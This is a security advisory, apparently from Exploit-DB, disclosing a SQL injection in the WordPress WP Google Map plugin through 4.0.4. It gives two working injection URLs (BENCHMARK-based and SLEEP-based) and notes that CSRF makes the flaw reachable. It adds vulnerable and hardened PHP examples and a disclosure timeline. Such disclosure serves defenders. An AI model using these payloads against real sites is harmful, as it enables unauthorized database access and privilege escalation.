WordPress Plugin Google Map < 4.0.4 - SQL Injection

  • Author: defensecode
    Date: 2018-06-12
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44883/
  • # Title: WordPress Google Map Plugin < 4.0.4 - SQL Injection
    # Author: defensecode
    # Date: 2018-06-12
    # Software: WordPress WP Google Map plugin
    # Version: 4.0.4 and below
    # Vendor Status: Vendor contacted, no response
    
    # Vulnerability Description
    # The easiest way to reproduce the vulnerabilities is to visit the
    # URLs below while logged in as an administrator, or as any other user
    # authorized to access the plugin's settings page. Users without full
    # administrative privileges could abuse the database access these
    # vulnerabilities provide to escalate their privileges, or to read and
    # modify database contents they are not supposed to be able to reach.
    
    # Because the settings page performs no nonce check, the vulnerable code
    # is also directly reachable through Cross-Site Request Forgery (CSRF):
    # an attacker can make a logged-in administrator's browser issue the
    # injected request on their behalf.
    
    # SQL injection
    # Vulnerable Function: $wpdb->get_results()
    # Vulnerable Variable: $_GET['order']
    # Vulnerable URL:
    
    http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc%20PROCEDURE%20ANALYSE(EXTRACTVALUE(4242,CONCAT(0x42,(BENCHMARK(42000000,MD5(0x42424242))))),42)
    
    # Note: PROCEDURE ANALYSE() was deprecated in MySQL 5.7 and removed in
    # MySQL 8.0, so this payload only confirms the injection on older servers;
    # the time-based payload below does not depend on it.
    
    
    # SQL injection
    # Vulnerable Function: $wpdb->get_results()
    # Vulnerable Variable: $_GET['orderby']
    # Vulnerable URL:
    
    http://vulnerablesite.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=location_address%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(555)))xxx)&order=asc
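The two URLs above work because the plugin interpolates $_GET['orderby'] and $_GET['order'] straight into the ORDER BY clause passed to $wpdb->get_results(), and the page carries no nonce. The following is an added example, not code from the WP Google Map plugin: it shows that vulnerable pattern beside a hardened handler. The function names, the action name wpgmp_example_manage_location and the table suffix map_locations are hypothetical; $wpdb, check_admin_referer(), current_user_can(), sanitize_key(), add_query_arg(), admin_url() and wp_nonce_url() are real WordPress APIs.

```php
<?php
/*
 * Added example, not the plugin's own code. Table, function and nonce action
 * names are hypothetical; the WordPress APIs used are real.
 */

/* Vulnerable pattern: both query parameters reach the SQL string unchanged,
 * so orderby=location_address AND (SELECT ...) or order=asc PROCEDURE ANALYSE(...)
 * is executed verbatim by $wpdb->get_results(). No nonce, no capability check. */
function wpgmp_example_list_locations_vulnerable() {
    global $wpdb;
    $table   = $wpdb->prefix . 'map_locations';               // hypothetical table
    $orderby = isset($_GET['orderby']) ? $_GET['orderby'] : 'location_id';
    $order   = isset($_GET['order'])   ? $_GET['order']   : 'asc';

    $sql = "SELECT * FROM {$table} ORDER BY {$orderby} {$order}";
    return $wpdb->get_results($sql);
}

/* Hardened version. ORDER BY identifiers cannot be bound with $wpdb->prepare()
 * placeholders (%s would quote them as strings), so they are validated against
 * a fixed whitelist instead. A nonce check rejects forged cross-site requests
 * before any query runs, and a capability check limits who may reach it. */
function wpgmp_example_list_locations_hardened() {
    global $wpdb;

    // CSRF: dies unless the request carries a valid _wpnonce for this action.
    check_admin_referer('wpgmp_example_manage_location');    // hypothetical action

    // Authorization: only users allowed to manage the site may run this.
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have permission to view this page.'));
    }

    $allowed_columns = array('location_id', 'location_title', 'location_address', 'location_city');
    // sanitize_key() lowercases and strips everything but [a-z0-9_-]; the
    // whitelist comparison is what actually decides whether the value is used.
    $orderby = isset($_GET['orderby']) ? sanitize_key($_GET['orderby']) : 'location_id';
    if (!in_array($orderby, $allowed_columns, true)) {
        $orderby = 'location_id';   // unknown column: fall back, never interpolate input
    }

    $order = isset($_GET['order']) ? strtoupper(sanitize_key($_GET['order'])) : 'ASC';
    if ($order !== 'ASC' && $order !== 'DESC') {
        $order = 'ASC';
    }

    $table = $wpdb->prefix . 'map_locations';
    // Both identifiers are now drawn from constants, so interpolation is safe.
    $sql = "SELECT * FROM {$table} ORDER BY {$orderby} {$order}";
    return $wpdb->get_results($sql);
}

/* Links to the settings page must carry the nonce the handler checks, otherwise
 * legitimate sorting links would be rejected along with forged ones. */
function wpgmp_example_manage_location_url($orderby, $order) {
    $url = add_query_arg(
        array('page' => 'wpgmp_manage_location', 'orderby' => $orderby, 'order' => $order),
        admin_url('admin.php')
    );
    return wp_nonce_url($url, 'wpgmp_example_manage_location');
}
```

With the hardened handler in place, both advisory URLs fail twice over: check_admin_referer() dies because no _wpnonce is present, and even with a valid nonce the injected orderby and order values are not in the whitelists and are replaced by the defaults, so SLEEP() and PROCEDURE ANALYSE() never reach MySQL.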
    
    # Disclosure Timeline
    # 2018/05/11 Vulnerabilities discovered
    # 2018/05/16 Vendor contacted
    # 2018/06/08 No response
    # 2018/06/12 Advisory released to the public